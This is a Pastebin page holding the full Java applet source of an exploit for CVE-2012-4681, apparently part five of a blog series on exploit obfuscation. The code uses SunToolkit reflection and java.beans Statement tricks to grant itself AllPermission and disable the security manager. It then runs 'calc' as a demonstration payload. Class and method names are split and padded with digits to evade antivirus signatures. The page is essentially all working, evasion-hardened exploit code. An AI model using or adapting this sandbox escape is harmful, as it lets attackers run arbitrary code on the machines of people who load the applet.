Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * Java 7 Exploit CVE-2012-4681 obfuscation pt. 5/5
- *
- * Affected product versions:
- * - JDK and JRE 7 Update 6 and before
- *
- * Post link: http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
- */
- import java.applet.Applet;
- import java.awt.Graphics;
- import java.beans.Expression;
- import java.beans.Statement;
- import java.lang.reflect.Field;
- import java.net.URL;
- import java.security.*;
- import java.security.cert.Certificate;
- import java.lang.reflect.Constructor;
- import java.lang.reflect.Method;
- public class Java extends Applet
- {
- // setSecurityManager
- String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
- // file
- char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
- // forName
- String ad = "or",me = "me", aw = "f", kl = "Na";
- // getField
- String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";
- // sun.awt.SunToolkit
- String s = "sun", u = "awt", n = "SunToolkit", dot = ".";
- public void enableSecurity() throws Throwable
- {
- Object ao[] = new Object[2];
- ao[0] = GimmeClass("java.beans.Statement");
- ao[1] = "a"+"c"+"c";
- Expression e = new Expression(GimmeClass(new String(s+dot+u+dot+n)), field.replaceAll("\\d",""), ao);
- e.execute();
- Field field = (Field)e.getValue();
- Class alPerm = Class.forName("jav"+"a."+"sec"+"u"+"rit"+"y.A"+"ll"+"Perm"+"iss"+"ion");
- Class perm = GimmeClass("java.se"+"curi"+"ty.P"+"ermi"+"ssi"+"ons");
- Object pe= perm.newInstance();
- Method method = pe.getClass().getMethod("ad"+"d", GimmeClass("java."+"secu"+"rity"+".Per"+"mis"+"sion"));
- method.invoke(pe, alPerm.newInstance());
- CodeSource cs = new CodeSource( new URL(new String(file)), new Certificate[0]);
- ProtectionDomain pd = new ProtectionDomain(cs, (Permissions)pe);
- AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });
- Class statClass = GimmeClass("ja"+"va."+"be"+"ans"+".S"+"tat"+"em"+"ent");
- Constructor con = statClass.getConstructor(new Class[]{ Object.class, String.class, Object[].class});
- Object stat = con.newInstance(GimmeClass("java.lan"+"g.S"+"ys"+"tem"),secMan.replaceAll("\\d",""), new Object[1]);
- field.set(stat, ac);
- Method m = stat.getClass().getMethod("ex"+"ecu"+"te");
- m.invoke(stat);
- }
- public void init()
- {
- try
- {
- enableSecurity();
- Runtime.getRuntime().exec("calc");
- }
- catch(Throwable t){}
- }
- private Class GimmeClass(String ps) throws Throwable
- {
- Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
- le.execute();
- return (Class)le.getValue();
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement